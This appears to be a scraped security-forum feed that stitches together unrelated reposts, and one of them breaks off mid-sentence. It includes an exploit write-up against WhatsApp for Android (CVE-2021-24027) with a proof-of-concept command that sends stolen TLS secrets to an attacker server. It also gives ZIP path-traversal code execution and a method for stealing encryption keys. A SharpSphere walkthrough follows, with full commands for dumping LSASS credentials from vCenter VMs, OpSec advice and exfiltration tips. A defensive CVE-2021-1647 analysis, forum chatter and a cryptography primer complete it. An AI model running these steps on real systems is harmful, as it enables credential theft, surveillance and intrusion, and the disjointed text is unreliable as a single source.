have access to a version of the app where both TLS man-in-the-disk vulnerabilities exist, then it is possible to carry out the second attack without emulation, by setting up two OpenSSL instances; one for TLS 1.2 MitM and one for TLS 1.3 (WaTLS) MitM. Both attacks start with an information gathering phase where the remote attacker will collect the TLS session secrets. In the video above, on the left, running on the dark theme, we can see the attacker device, and on the right, running on the light theme, the victim device. The attacker begins information gathering by executing main.py of the proof-of-concept toolset, which makes use of Python and Frida to control the attacking device. This is how the command looks like: python main.py -s ANDROID_SERIAL -a 192.168.1.100 -p 8000 images/the_guardian.jpg \ MOBILE_NUMBER@s.whatsapp.net "Rush for Mediterranean gas" -r Argument -s ANDROID_SERIAL instructs ADB to connect to the attacker's device with the specified device serial number. Arguments -a and -p determine the IP address and port of the web server, where the SOP exploit will POST the extracted secrets to using AJAX, while -r instructs our PoC to run a simple HTTP server on the local PC. Alternatively one could have specified the IP of a remote web server the attacker controls. The three non-positional arguments are (1) the path to an image to show as a fake message preview at the victim's side, (2) the victim's mobile number and, (3) a string to show as a caption below the fake preview. The PoC uses Frida hooks on a WhatsApp method responsible for sending document messages. It attaches the fake message preview and caption in the outgoing protocol buffer to make the result more attractive for the victim to click on. In this demonstration, the remote attacker sends to the victim what it looks like a link to an interesting article on a newspaper. Upon clicking on the message, the victim is presented with the standard Android application picker. The message's mime type, as sent in the WhatsApp protocol buffer headers, is set to 'text/html', so Chrome is usually the only entry in the aforementioned picker. When the victim clicks on the message, the SOP exploit executes. For debugging purposes we have designed an HTML page that displays progress information during exploitation, but a real life scenario might have an actual newspaper article being displayed on the victim's screen. The exploit, in just a few seconds, brute-forces the first 1000 IDs in the Media Store and locates files that look like serialized TLS sessions. Using AJAX, these files are sent back to a server of the attacker's choosing. In this demonstration, the web-server has been started on the attacker's PC and the received TLS secrets are stored under /tmp in files with the .bin extension. With the TLS material now in the attacker's possession, the victim is now exposed to man-in-the-middle attacks. To gain a man-in-the-middle position in the network, the attacker may use several methods (e.g. ARP spoofing, DNS spoofing, router / BGP hijacking, tapping of communication links etc.) depending on the resources available. Nation state actors have demonstrated in the past increased capabilities in this area of attacks. It might be the case that there are several opportunities for code execution once a MitM channel has been established, but for demonstration purposes, this section focuses on a simple file overwrite capability made available through TLS-transported ZIP files. The WhatsApp client uses photo filters and doodle emojis, which are downloaded from the upstream network. Both of these resources are referred to as downloadables in the WhatsApp Java code. Use of downloadables depends on WhatsApp network configuration parameters. Where the author lives, filters seem to be enabled, while emojis are disabled, so this attack will focus on the former. Additionally, photo filters are downloaded the first time a user attempts to use them, and are not downloaded again for the rest of the WhatsApp installation lifetime, while doodle emojis are refreshed every now and then. Consequently, the attacker has a single chance of exploiting filters, while more cases are available for performing MitM on the emoji downloader. Interested readers can check the related network settings on their devices: # pwd /data/data/com.whatsapp/shared_prefs # grep -r downloadable_doodle . If no result is shown, downloadable doodle emojis are disabled on your device. When the user attempts to use photo filters, WhatsApp performs an HTTP request in the background to the following URL: https://static.whatsapp.net/downloadable?category=filter A ZIP bundle is downloaded from the above location and extracted using the following piece of code, which can be found in class FilterManager (X.2FB). Similar code can be found in the DoodleEmojiManager class (X.1zX) for Emojis. public boolean unsafeExtractManifestEntryZip(HttpResponseInterface response, String str) { FileOutputStream fileOutputStream; ... // (1) ZipInputStream zipInputStream = new ZipInputStream( new MessageInputStream(response.getInputStream(), this.A06, 0) ); ... byte[] bArr = new byte[8192]; while(true) { // (2) ZipEntry nextEntry = zipInputStream.getNextEntry(); ... // (3) fileOutputStream = new FileOutputStream( new File(idHashFileName.getAbsolutePath(), nextEntry.getName()) ); while(true) { int read = zipInputStream.read(bArr); if(read == -1) break; fileOutputStream.write(bArr, 0, read); } fileOutputStream.close(); } zipInputStream.close(); ... } Focusing only on the relevant parts, at (1) a ZipInputStream is instantiated. The input to the ZipInputStream comes from another type of input stream which, in turn, reads its input from the HTTP channel established to the aforementioned URL. As the ZIP bundle is downloaded, input flows to the ZipInputStream and ZIP entries are parsed one-by-one at (2). The most interesting stuff happens at (3), where a FileOutputStream is created to a destination file whose name is constructed by concatenating the return value of getAbsolutePath() of a directory with the string returned from the ZIP entry's getName(). As is already known, the name of an entry in a ZIP directory should not be trusted, as it might contain directory traversal sequences. It's exactly this "feature" that an attacker can exploit to overwrite arbitrary files owned by WhatsApp. The next question is what file can an attacker overwrite in order to eventually execute code with the privileges of the WhatsApp client. Unfortunately, WhatsApp for no apparent reason makes use of Facebook's superpack for distributing its native libraries. What happens is that all native DSOs are placed in a compressed archive, in a proprietary format, and then packed in the application's APK as a raw asset. When the application is executed, native libraries are extracted under data/ and SoLoader [31] is used to load them. Attackers are thus able to modify the extracted libraries and have the victim application load untrusted code. Here's where the extracted libraries can be found: # pwd /data/data/com.whatsapp/files/decompressed/libs.spk.zst # ls -la total 9042 drwx------ 2 u0_a168 u0_a168 3488 2021-02-10 17:30 . drwx------ 3 u0_a168 u0_a168 3488 2021-01-25 17:11 .. -rw------- 1 u0_a168 u0_a168 32 2021-02-10 17:30 .superpack_version -rw------- 1 u0_a168 u0_a168 1055016 2021-02-10 17:30 libc++_shared.so -rw------- 1 u0_a168 u0_a168 123744 2021-02-10 17:30 libcurve25519.so -rw------- 1 u0_a168 u0_a168 134056 2021-02-10 17:30 libfbjni.so -rw------- 1 u0_a168 u0_a168 47656 2021-02-10 17:30 libgifimage.so -rw------- 1 u0_a168 u0_a168 76296 2021-02-10 17:30 libminscompiler-jni.so -rw------- 1 u0_a168 u0_a168 200000 2021-02-10 17:30 libprofilo.so -rw------- 1 u0_a168 u0_a168 68368 2021-02-10 17:30 libprofilo_atrace.so -rw------- 1 u0_a168 u0_a168 23096 2021-02-10 17:30 libprofilo_build.so -rw------- 1 u0_a168 u0_a168 67688 2021-02-10 17:30 libprofilo_fb.so -rw------- 1 u0_a168 u0_a168 3720 2021-02-10 17:30 libprofilo_fmt.so -rw------- 1 u0_a168 u0_a168 23976 2021-02-10 17:30 libprofilo_linker.so -rw------- 1 u0_a168 u0_a168 68296 2021-02-10 17:30 libprofilo_mmapbuf.so -rw------- 1 u0_a168 u0_a168 48688 2021-02-10 17:30 libprofilo_plthooks.so -rw------- 1 u0_a168 u0_a168 9144 2021-02-10 17:30 libprofilo_sigmux.so -rw------- 1 u0_a168 u0_a168 134328 2021-02-10 17:30 libprofilo_stacktrace.so -rw------- 1 u0_a168 u0_a168 68432 2021-02-10 17:30 libprofilo_systemcounters.so -rw------- 1 u0_a168 u0_a168 68080 2021-02-10 17:30 libprofilo_threadmetadata.so -rw------- 1 u0_a168 u0_a168 83928 2021-02-10 17:30 libprofilo_util.so -rw------- 1 u0_a168 u0_a168 3240 2021-02-10 17:30 libprofiloextapi.so -rw------- 1 u0_a168 u0_a168 395992 2021-02-10 17:30 libstatic-webp.so -rw------- 1 u0_a168 u0_a168 5880 2021-02-10 17:30 libvlc.so -rw------- 1 u0_a168 u0_a168 6378408 2021-02-10 17:30 libwhatsapp.so -rw------- 1 u0_a168 u0_a168 119408 2021-02-10 17:30 libyoga.so The following video demonstrates the attack. A malicious libwhatsapp.so library is extracted over the legitimate one. WhatsApp exits and immediately attempts to restart. The malicious library is loaded and "pwnd!" is recorded to the system logs. Please note the following: The relevant material can be found in the PoC's tls12_psk_extract/ directory. Detailed instructions for setting up the MitM environment can be found in README.md in the same directory. To make testing and demonstration easier, instead of carrying out the information gathering phase again and again, we make use of ADB to pull the TLS session files directly from the victim device. These files correspond to the leaked .bin files shown in the previous video. The video shows the attacker preparing payload.zip, a ZIP file that holds the malicious libwhatsapp.so library. The name of the ZIP entry is modified to contain directory traversal sequences and the final archive is copied in tls12_psk_extract/ to be used by our MitM server scripts. Leaked TLS 1.2 sessions are actually DER-encoded structures. Recall that Android uses BoringSSL, while most Linux and Mac OS X PCs use OpenSSL instead. To make the leaked session recognizable by OpenSSL, one has to convert between the two DER formats. Script convert_session.sh, which, uses boringssl_session.cpp and openssl_session.c in the background, is used for this task. The resulting OpenSSL session file is stored in the current directory under session.der (DER format) and session.pem (PEM format). Session information is further displayed on the screen. The last command in the long listing is a wrapper shell script, namely run_server.sh, that executes an OpenSSL version specially modified to perform MitM attacks on WhatsApp's TLS 1.2. The patch for OpenSSL 1.1.1f can be found in openssl-1.1.1f-patches/tls12-mitm.patch. In the video one can see the victim attempting to send a picture to the attacker. WhatsApp attempts to download the photo filters from the URL mentioned above, but, instead, the modified s_server serves the malicious ZIP payload. Stealing the victim's Noise protocol key pair In this section we will see how the attained man-in-the-middle capability could also lead to the compromise of the confidentiality of user communications. The WhatsApp Security Whitepaper [23] explains that user communications are protected through end-to-end (E2E) encryption. The protocol used for E2E encryption is the Noise protocol [05]. WhatsApp comes with a debugging mechanism that allows its development team to catch fatal errors happening in the wild during the first few days of a release. More specifically, if an OutOfMemoryError exception is thrown, a custom exception handler is invoked that collects System Information, WhatsApp Application Logs, as well as a dump of the Application Heap (collected using android.os.Debug::dumpHprofData()). These are uploaded to crashlogs.whatsapp.net. This process is carried out if and only if less than 10 days have elapsed since the current version's release date. Needless to say, the heap content that is uploaded to the WhatsApp infrastructure holds sensitive user information. Using the strings tool against the dumped heap data, one can easily identify plaintext conversations, and more interestingly Noise protocol key pairs, encoded in base64 form. The relevant code can be found in class OOMHandler (X.0nS😞 public void uncaughtException(Thread thread, Throwable throwable) { ... // (1) if(C008703v.getNumberOfDaysSinceReleaseDate(r12.expirationChecker) > 10) { z5 = true; } if(z5) { Log.m19i("OOMHandler/hprof dump not allowed"); } else { ... // (2) Debug.dumpHprofData(String.format(Locale.US, "%s/dump.hprof", new Object[] { r12.hprofFilenameMatcher.context.getCacheDir().getPath() })); Log.m19i("OOMHandler/dump successful"); } ... } At (1), getNumberOfDaysSinceReleaseDate() is called, which performs the action its name indicates. If the return value is larger than 10, the heap contents are not dumped. However, in case less than 10 days have elapsed since the release date, heap content is written in dump.hprof and placed in the application's private cache directory. From an attacker's perspective, the above process is quite interesting, as all connections to the crash logs server, even though they are protected through TLS, can be intercepted after extracting the corresponding Master Secret from the victim's device. Interestingly, WhatsApp uses both TLS 1.2 as well as TLS 1.3 (WaTLS), during the information upload process; logs are uploaded using TLS 1.2, while heap contents using TLS 1.3 (WaTLS). With the corresponding Master Secret / PSK extracted from a victim's device, both connections can be intercepted and their contents can be read in plaintext. With this in mind, one might wonder how can an OutOfMemoryError exception be triggered remotely on the victim's device. While the author was preparing his debugging environment, he noticed that WhatsApp performs the following HTTP request quite often: https://static.whatsapp.net/sticker?cat=all&lg=en-US&country=GR&ver=2 Even though the exact mechanics leading to this action are not known to the author, a quick visit to the above location shows that this URL hosts a JSON file holding information on WhatsApp sticker packs. Turns out, a method, we have named openStickerConnection() (defined in class X.2kz), is responsible for connecting to this URL and downloading the response. Here's what it looks like: public final ETagAndStickerPacksBundle openStickerConnection(String url, String etag) { HttpsURLConnection httpsURLConnection; ... // (1) httpsURLConnection = new URL(url).openConnection(); httpsURLConnection.setSSLSocketFactory(this.A06.getMediaExternalSSLCacheEnabledSSLSocketFactory()); httpsURLConnection.setRequestProperty("User-Agent", this.A07.getUserAgent()); httpsURLConnection.setConnectTimeout(15000); httpsURLConnection.setReadTimeout(30000); httpsURLConnection.setRequestMethod("GET"); ... int responseCode = httpsURLConnection.getResponseCode(); if(responseCode == 200) { ... InputStream inputStream = httpsURLConnection.getInputStream(); // (2) String json = C27551It.readAllFromInputStream(inputStream); AssertUtil.assertNotNull(json); JSONArray jSONArray = new JSONArray(json); ... } ... } At (1) WhatsApp initiates an HTTP connection to the given URL. One thing to note here is that the connection's SSLSocketFactory is set to the return value of getMediaExternalSSLCacheEnabledSSLSocketFactory(). The latter returns an instance of the TLS 1.2 SSL factory that stores TLS sessions in the device's external storage and, thus, it is possible for an attacker to intercept this connection. Later on, at (2), one can see that once an input stream has been opened, WhatsApp uses readAllFromInputStream() of class X.1It to read the whole response in a single string buffer, no matter how large the latter is. For completeness, the code of readAllFromInputStream() is shown below: public static String readAllFromInputStream(InputStream inputStream) { char[] buf = new char[8192]; BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream)); StringWriter stringWriter = new StringWriter(); while(true) { int read = bufferedReader.read(buf); if(read < 0) { bufferedReader.close(); return stringWriter.toString(); } else if(!Thread.currentThread().isInterrupted()) { stringWriter.write(buf, 0, read); } else { throw new InterruptedIOException(); } } } Sending an arbitrarily large response to the client will eventually trigger an Out-Of-Memory (OOM) condition. Furthermore, to avoid sending large amounts of data, and trigger the OOM faster, an attacker can use GZip encoding. Once an OutOfMemoryError is thrown, WhatsApp's custom exception handler will be called to handle the situation. System information will be collected, and the upload process will be triggered. Intercepting the connection will disclose all the sensitive information that was intended to be sent to WhatsApp's internal infrastructure. The following image shows how a successful attack looks like: The screenshot above shows a tmux session. The window on the left shows the output of openssl_http_pipe.py (found under tls12_psk_extract/), a tool that forks a modified OpenSSL s_server instance and communicates with it over a pipe, in order to allow a user to handle HTTP requests manually. The lines at the very bottom, show the POST request that WhatsApp issues in order to upload the heap data. In our case, around 4Mb of data have been grabbed. The window on the right shows a brief overview of this data. It can be seen that it's actually a part of a multipart request, corresponding to a file named dump.gz. The latter's contents are not shown here in full, as they contain cryptographic material of an actual WhatsApp account. The tooling required for this attack can be found in the PoC's tls12_psk_extract/ directory. Detailed instructions for setting up the MitM environment can be found in README.md in the same directory. Conclusion and future work This blog post demonstrated the potential of exploiting man-in-the-disk (MitD) vulnerabilities using remote vectors. More specifically, TLS session secrets of WhatsApp were found to be stored erroneously in an unprotected directory. These were collected remotely through the exploitation of a vulnerability in an Android component (CVE-2020-6516, a Same-Origin-Policy bypass bug of Chrome). Of course, the collection of secrets could have also been achieved through the introduction of a malicious application on the victim's device. Once the TLS session secrets were collected it was possible to perform a man-in-the-middle attack to WhatsApp communications. The man-in-the-middle attack allowed the attacker to execute arbitrary code on the victim's device. Moreover, the man-in-the-middle attack allowed for the collection of the victim user's Noise protocol cryptographic material, which could later be used for the decryption of user communications. The introduction of Scoped Storage in Android greatly limits the impact of man-in-the-disk vulnerabilities. Android 11 is the first version of Android to fully enforce scoped storage, allowing apps to access by default only their own resources on external storage. CENSUS strongly recommends to users to make sure they are using WhatsApp version 2.21.4.18 or greater on the Android platform, as previous versions are vulnerable to the aforementioned bugs and may allow for remote user surveillance. CENSUS has tracked the TLS 1.2 man-in-the-disk vulnerability under CVE-2021-24027 [33]. There are many more subsystems in WhatsApp which might be of great interest to an attacker. The communication with upstream servers and the E2E encryption implementation are two notable ones. Additionally, despite the fact that this work focused on WhatsApp, other popular Android messaging applications (e.g. Viber, Facebook Messenger), or even mobile games might be unwillingly exposing a similar attack surface to remote adversaries. References [01] https://blog.checkpoint.com/2018/08/12/man-in-the-disk-a-new-attack-surface-for-android-apps/ [02] https://bugs.chromium.org/p/chromium/issues/detail?id=1092449 [03] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6516 [04] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24027 [05] http://www.noiseprotocol.org/ [06] https://citizenlab.ca/2019/09/poison-carp-tibetan-groups-targeted-with-1-click-mobile-exploits/ [07] https://www.washingtonpost.com/technology/2019/10/29/whatsapp-accuses-israeli-firm-helping-governments-hack-phones-journalists-human-rights-workers/ [08] https://github.com/skylot/jadx [09] https://developer.android.com/guide/topics/providers/content-providers [10] https://developer.android.com/guide/topics/manifest/provider-element [11] https://android.googlesource.com/platform/frameworks/base/+/962fb40991f15be4f688d960aa00073683ebdd20%5E%21/#F0 [12] https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy [13] https://developer.android.com/about/versions/10/privacy/changes#scoped-storage [14] https://chromium.googlesource.com/chromium/src/+/c6e232163d52e4334f7227ef30634b707e44a903%5E%21/#F4 [15] https://developer.mozilla.org/en-US/docs/Web/API/Fetch_API [16] http://phrack.org/issues/69/13.html [17] https://tools.ietf.org/html/rfc8446 [18] https://developer.android.com/reference/javax/net/ssl/X509TrustManager [19] https://tools.ietf.org/html/rfc5077 [20] https://www.openssl.org/docs/man1.1.1/man3/SSL_set_psk_find_session_callback.html [21] https://tools.ietf.org/html/rfc5246 [22] https://tools.ietf.org/html/rfc7627 [23] https://www.whatsapp.com/security/WhatsApp-Security-Whitepaper.pdf [24] https://threatpost.com/researchers-find-ssl-problems-in-whatsapp/104411/ [25] http://aosp.opersys.com/xref/android-10.0.0_r47/xref/external/conscrypt/repackaged/common/src/main/java/com/android/org/conscrypt/FileClientSessionCache.java#44 [26] https://docs.oracle.com/javase/7/docs/api/javax/net/ssl/SSLSocket.html#startHandshake() [27] https://docs.oracle.com/javase/7/docs/api/javax/net/ssl/SSLSessionContext.html#getSession(byte[]) [28] https://developer.android.com/reference/android/net/SSLSessionCache [29] https://krebsonsecurity.com/2019/02/a-deep-dive-on-the-recent-widespread-dns-hijacking-attacks/ [30] https://blog.talosintelligence.com/2019/04/seaturtle.html [31] https://github.com/facebook/SoLoader [32] https://twitter.com/Shiftreduce/status/1347546599384346624/photo/1 [33] WhatsApp Exposure of TLS 1.2 Cryptographic Material to Third Party Apps (CVE-2021-24027) [34] WhatsApp for Android [35] https://www.appbrain.com/stats/top-android-sdk-versions [36] READ_EXTERNAL_STORAGE permission in Android apps [37] https://github.com/CENSUS/whatsapp-mitd-mitm Sursa: https://census-labs.com/news/2021/04/14/whatsapp-mitd-remote-exploitation-CVE-2021-24027/
  19. Dumping LSASS with SharpShere The dump function of SharpSphere allows operators to dump LSASS from any powered on VM managed by vCenter or ESXI, without needing to authenticate to the guest OS and without needing VMware Tools to be installed. This technique is not new and has been around for many years: https://danielsauder.com/2016/02/06/memdumps-volatility-mimikatz-vms-part-6-vmware-workstation/ https://web.archive.org/web/20210204072538/https://www.remkoweijnen.nl/blog/2013/11/25/dumping-passwords-in-a-vmware-vmem-file/ Although until now it’s been very difficult to leverage operationally. At its core, the process is: Authenticate to vCenter/ESXi Create a snapshot, with memory, of a powered on target VM Download the (often very large) .vmem and .vmsn files from the datastore Either run it through Volatility Or convert to .dmp with vmss2core and run it through WinDbg with Mimikatz Arguments Z:\>SharpSphere.exe dump --help SharpSphere 1.0.0.0 Copyright © 2020 --url Required. vCenter SDK URL, i.e. https://127.0.0.1/sdk --username Required. vCenter username, i.e. administrator@vsphere.local --password Required. vCenter password --targetvm Required. VM to snapshot --snapshot (Default: false) WARNING: Creates and then deletes a snapshot. If unset, SharpSphere will only extract memory from last existing snapshot, or none if no snapshots are available. --destination Required. Full path to the local directory where the file should be downloaded --help Display this help screen. --version Display version information. –snapshot By default, SharpSphere will not attempt to create a snapshot and will instead attempt to find valid .vmem and .vmsn files from an existing snapshot. This is preferrable from an OpSec perspective because there will be no evidence in the UI, however it’s obviously not guaranteed that a particular target VM has any snapshots, or whether these snapshots also captured the VM’s memory. If no existing snapshot exists then SharpSphere will exit. With --snapshot specified, SharpSphere will create a snapshot called System Backup [TIMESTAMP], download its associated ‘.vmem and .vmsn files, and then delete the snapshot once finished. Both the creation and deletion of the snapshot will be seen by other users in the Recent Tasks Window. It’s possible to attempt it without the --snapshot first to see if existing snapshots exist, and then repeat with --snapshot specified if none exist. –destination SharpSphere needs to download two files from the snapshot, a large .vmem file that is equal in size to the amount of RAM assigned to the machine (i.e. 4GB, 8GB, 16GB etc.), and a much smaller .vmsn file. It downloads these files to the directory specified by --destination on the executing machine. When running through Cobalt Strike’s execute-assembly this is obviously a directory on the beacon machine’s filesystem. This is an important distinction to make because it’s likely your target user is on an internal network and therefore the download should be relatively quick, as opposed to having to download these files over your beacon’s proxy. Once the two files are downloaded, SharpSphere adds both to a zip file with a random name and then deletes them. This makes the resultant file marginally easier to exfiltrate, for example during testing a 4GB .vmem file resulted in a 800MB zip. Instructions Execute SharpSphere with the following arguments (Hint: get the VM name with list😞 SharpSphere.exe dump --url https://[IP or FQDN]/sdk --username [USERNAME] --password [PASSWORD] --targetvm [NAME OF VM] --destination [LOCATION TO DOWNLOAD FILES] Example Output C:\Users\Administrator\Desktop>SharpSphere.exe dump --url https://vcenter.globex.com/sdk --username administrator@vsphere.local --password Password1! --targetvm "Windows 10" --destination "C:\Users\Public" [x] Disabling SSL checks in case vCenter is using untrusted/self-signed certificates [x] Creating vSphere API interface, takes a few minutes... [x] Connected to VMware vCenter Server 7.0.1 build-17005016 [x] Successfully authenticated [x] Finding existing snapshots for Windows 10... Error: No existing snapshots found for the VM Windows 10, recommend you try again with --snapshot set If no snapshots exist, repeat the same command and include --snapshot SharpSphere.exe dump --url https://vcenter.globex.com/sdk --username administrator@vsphere.local --password Password1! --targetvm "Windows 10" --destination "C:\Users\Public" --snapshot [x] Disabling SSL checks in case vCenter is using untrusted/self-signed certificates [x] Creating vSphere API interface, takes a few minutes... [x] Connected to VMware vCenter Server 7.0.1 build-17005016 [x] Successfully authenticated [x] Creating snapshot for VM Windows 10... [x] Snapshot created successfully [x] Downloading Windows 10-Snapshot51.vmem (4096MB) to C:\Users\Public\z53dqmxx.5bz... [x] Downloading Windows 10-Snapshot51.vmsn to C:\Users\Public\hwu5gv2d.ezv... [x] Download complete, zipping up so it's easier to exfiltrate... [x] Zipping complete, download C:\Users\Public\cec0kwgk.b2m (916MB), rename to .zip, and follow instructions to use with Mimikatz [x] Deleting the snapshot we created If your C2 infrastructure and bandwidth supports it, download the resultant zip to your attacker controlled machine. Alternatively, and less OpSec-safe, upload the necessary tools to the beacon machine, with the understanding that these tools may be flagged as suspicious. The rest of the instructions assumes you’ve managed to get the file back to your machine. Rename the random file, in this instance cec0kwgk.b2m, to be a zip file and then extract the two files. The larger one is your .vmem file. Download vmss2core and provide it first with the smaller .vmsn file and then the larger .vmem file. If the target VM is Microsoft Windows 8/8.1, Windows Server 2012, Windows Server 2016 or Windows Server 2019 then execute with -W8: vmss2core-sb-8456865.exe -W8 hwu5gv2d.ezv z53dqmxx.5bz Otherwise use -W: vmss2core-sb-8456865.exe -W hwu5gv2d.ezv z53dqmxx.5bz Download WinDbg and load the resultant .dmp file that vmss2core generated as a Crash Dump. Download Mimikatz and load Mimilib.dll from within WinDbg .load C:\Tools\Mimikatz\x64\mimilib.dll Find the LSASS process !process 0 0 lsass.exe Switch to that process .process /r /p ffffc70462d020c0 Profit !mimikatz Written on February 26, 2021 Sursa: https://jamescoote.co.uk/Dumping-LSASS-with-SharpShere/
  20. CVE-2021-1647: Windows Defender mpengine remote code execution Maddie Stone The Basics Disclosure or Patch Date: 12 January 2021 Product: Microsoft Windows Defender Advisory: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1647 Affected Versions: Version 1.1.17600.5 and previous First Patched Version: Version 1.1.17700.4 Issue/Bug Report: N/A Patch CL: N/A Bug-Introducing CL: N/A Reporter(s): Anonymous The Code Proof-of-concept: Exploit sample: 6e1e9fa0334d8f1f5d0e3a160ba65441f0656d1f1c99f8a9f1ae4b1b1bf7d788 Did you have access to the exploit sample when doing the analysis? Yes The Vulnerability Bug class: Heap buffer overflow Vulnerability details: There is a heap buffer overflow when Windows Defender (mpengine.dll) processes the section table when unpacking an ASProtect packed executable. Each section entry has two values: the virtual address and the size of the section. The code in CAsprotectDLLAndVersion::RetrieveVersionInfoAndCreateObjects only checks if the next section entry's address is lower than the previous one, not if they are equal. This means that if you have a section table such as the one used in this exploit sample: [ (0,0), (0,0), (0x2000,0), (0x2000,0x3000) ], 0 bytes are allocated for the section at address 0x2000, but when it sees the next entry at 0x2000, it simply skips over it without exiting nor updating the size of the section. 0x3000 bytes will then be copied to that section during the decompression, leading to the heap buffer overflow. if ( next_sect_addr > sect_addr )// current va is greater than prev (not also eq) { sect_addr = next_sect_addr; sect_sz = (next_sect_sz + 0xFFF) & 0xFFFFF000; } // if next_sect_addr <= sect_addr we continue on to next entry in the table [...] new_sect_alloc = operator new[](sect_sz + sect_addr);// allocate new section [...] Patch analysis: There are quite a few changes to the function CAsprotectDLLAndVersion::RetrieveVersionInfoAndCreateObjects between version 1.1.17600.5 (vulnerable) and 1.1.17700.4 (patched). The directly related change was to add an else branch to the comparison so that if any entry in the section array has an address less than or equal to the previous entry, the code will error out and exit rather than continuing to decompress. Thoughts on how this vuln might have been found (fuzzing, code auditing, variant analysis, etc.): It seems possible that this vulnerability was found through fuzzing or manual code review. If the ASProtect unpacking code was included from an external library, that would have made the process of finding this vulnerability even more straightforward for both fuzzing & review. (Historical/present/future) context of bug: The Exploit (The terms exploit primitive, exploit strategy, exploit technique, and exploit flow are defined here.) Exploit strategy (or strategies): The heap buffer overflow is used to overwrite the data in an object stored as the first field in the lfind_switch object which is allocated in the lfind_switch::switch_out function. The two fields that were overwritten in the object pointed to by the lfind_switch object are used as indices in lfind_switch::switch_in. Due to no bounds checking on these indices, another out-of-bounds write can occur. The out of bounds write in step 2 performs an or operation on the field in the VMM_context_t struct (the virtual memory manager within Windows Defender) that stores the length of a table that tracks the virtual mapped pages. This field usually equals the number of pages mapped * 2. By performing the 'or' operations, the value in the that field is increased (for example from 0x0000000C to 0x0003030c. When it's increased, it allows for an additional out-of-bounds read & write, used for modifying the memory management struct to allow for arbitrary r/w. Exploit flow: The exploit uses "primitive bootstrapping" to to use the original buffer overflow to cause two additional out-of-bounds writes to ultimately gain arbitrary read/write. Known cases of the same exploit flow: Unknown. Part of an exploit chain? Unknown. The Next Steps Variant analysis Areas/approach for variant analysis (and why): Review ASProtect unpacker for additional parsing bugs. Review and/or fuzz other unpacking code for parsing and memory issues. Found variants: N/A Structural improvements What are structural improvements such as ways to kill the bug class, prevent the introduction of this vulnerability, mitigate the exploit flow, make this type of vulnerability harder to exploit, etc.? Ideas to kill the bug class: Building mpengine.dll with ASAN enabled should allow for this bug class to be caught. Open sourcing unpackers could allow more folks to find issues in this code, which could potentially detect issues like this more readily. Ideas to mitigate the exploit flow: Adding bounds checking to anywhere indices are used. For example, if there had been bounds checking when using indices in lfind_switch::switch_in, it would have prevented the 2nd out-of-bounds write which allowed this exploit to modify the VMM_context_t structure. Other potential improvements: It appears that by default the Windows Defender emulator runs outside of a sandbox. In 2018, there was this article that Windows Defender Antivirus can now run in a sandbox. The article states that when sandboxing is enabled, you will see a content process MsMpEngCp.exe running in addition to MsMpEng.exe. By default, on Windows 10 machines, I only see MsMpEng.exe running as SYSTEM. Sandboxing the anti-malware emulator by default, would make this vulnerability more difficult to exploit because a sandbox escape would then be required in addition to this vulnerability. 0-day detection methods What are potential detection methods for similar 0-days? Meaning are there any ideas of how this exploit or similar exploits could be detected as a 0-day? Detecting these types of 0-days will be difficult due to the sample simply dropping a new file with the characteristics to trigger the vulnerability, such as a section table that includes the same virtual address twice. The exploit method also did not require anything that especially stands out. Other References February 2021: 浅析 CVE-2021-1647 的漏洞利用技巧("Analysis of CVE-2021-1647 vulnerability exploitation techniques") by Threatbook Sursa: https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-1647.html
  21. Nu uitati, weekend, CTF, premii! https://ctf.rstforums.com/ Daca mai poate cineva contribui cu exercitii, nu foarte dificile, e perfect.
  22. Eu m-am programat la Romexpo cand mai erau 3000 pe lista de asteptare. Si cred ca dupa vreo 2 saptamani m-am putut programa.
  23. Nu ma pregatesc sa dau niciun ordin, minti lumea pe fata. Cat despre dat burta jos, tot incerc dar nu imi iese... Poate cei care dau ordinul imi dau si niste sfaturi ca sa scap de burta.
  24. Salut, SHA256/SHA512 etc nu se pot inversa pentru ca sunt algoritmi de hashing. De exemplu, un hash sha256 pentru textul "Gigel" va fi 38810d5f65b12d1433aaff068818bc1f298a322b2a45a8f335645c8fe3af3510 Un hash pentru "Gigel se duce la plimbare si vede o fata de care se indragosteste apoi uita de ea cand vede un Lamborghini si gaseste 10 RON pe jos" va avea urmatorul hash: 299c91444f0f7f8ee3cf12ffc4a9483bc1caf5f43f68b0593b1dddd84a0b44be Dupa cum vezi, indiferent de lungimea textului, lungimea hash-ului este aceeasi. Chiar daca textul (sau binarul) are 1KB sau 2 TB, un hash va avea aceeasi lungime si va fi mereu acelasi pentru acelasi input. De aceea sunt folosite pentru a nu stoca parolele in plain-text in baza de date. Ca sa luam un exemplu mai simplu: CNP. Acesta contine sexul, data nasterii, judetul ... iar ultima cifra este o "suma de control". Algoritmul exact este descris aici: https://ro.wikipedia.org/wiki/Cod_numeric_personal_(România) - asa se calculeaza acea ultima cifra. Dar sa luam un exemplu mai simplu, sa zicem ca pentru CNP 1881111111116 suma de control este cifra "6" de la final si ca se calculeaza doar adunand cifrele si scotand restul impartirii la 10 (%10 adica). Un hash, ca idee, e ceva asemanator. Un hash reprezinta de fapt acel "6" de la final. Poti din acel 6 sa deduci CNP-ul? E destul de clar ca nu. Singurul lucru care se poate face pe hash-uri e bruteforce, care poate fi optimizat din cauza unor "probleme" in algoritmul hash-urilor. Adica sa incerci a faci hash din orice combinatii de text: aaaaaa, aaaaab, aaaaac etc pana ajungi la hash-ul dorit. Discutia se poate prelungi.
  25. CRYPTOGRAPHY CHEAT SHEET FOR BEGINNERS 1 What is cryptography? Cryptography is a collection of techniques for: concealing data transmitted over insecure channels validating message integrity and authenticity 2 Some cryptographic terms plaintext – a message or other data in readable form ciphertext – a message concealed for transmission or storage encryption – transforming plaintext into ciphertext decryption – transforming ciphertext back into plaintext key – an input to an encryption or decryption algorithm that determines the specific transformation applied hash – the output of an algorithm that produces a fixed N-bit output from any input of any size entropy – the number of possible states of a system, or the number of bits in the shortest possible description of a quantity of data. This may be less than the size of the data if it is highly redundant. 3 Basic cryptographic algorithms 3.1 symmetric ciphers A symmetric cipher uses the same key for encryption and decryption. In semi-mathematical terms, encryption: ciphertext = E(plaintext, key) decryption: plaintext = D(ciphertext, key) Two parties that want to communicate via encryption must agree on a particular key to use, and sharing and protecting that key is often the most difficult part of protecting encryption security. The number of possible keys should be large enough that a third party can’t feasibly try all of the keys (“brute-forcing”) to see if one of them decrypts 